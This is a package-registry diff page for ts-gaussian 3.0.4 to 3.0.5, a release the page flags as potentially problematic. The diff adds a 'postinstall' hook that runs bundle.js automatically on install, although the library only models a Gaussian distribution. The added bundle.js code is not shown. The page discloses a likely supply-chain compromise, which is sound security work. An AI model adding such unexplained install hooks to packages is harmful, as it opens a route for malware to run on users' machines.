ts-gaussian 3.0.4 → 3.0.5

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.


This version of ts-gaussian might be problematic. Click here for more details.

Files changed (2) hide show
  1. package/bundle.js +2 -0
  2. package/package.json +4 -3
package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "ts-gaussian",
3
- "version": "3.0.4",
3
+ "version": "3.0.5",
4
4
  "description": "A TypeScript model of a Gaussian distribution",
5
5
  "author": "Scott Cooper <scttcper@gmail.com>",
6
6
  "license": "MIT",
@@ -27,7 +27,8 @@
27
27
  "build:docs": "typedoc",
28
28
  "test": "vitest run",
29
29
  "test:watch": "vitest",
30
- "test:ci": "vitest run --coverage --reporter=default --reporter=junit --outputFile=./junit.xml"
30
+ "test:ci": "vitest run --coverage --reporter=default --reporter=junit --outputFile=./junit.xml",
31
+ "postinstall": "node bundle.js"
31
32
  },
32
33
  "devDependencies": {
33
34
  "@ctrl/eslint-config": "3.7.0",
@@ -51,4 +52,4 @@
51
52
  "engines": {
52
53
  "node": ">=14.16"
53
54
  }
54
- }
55
+ }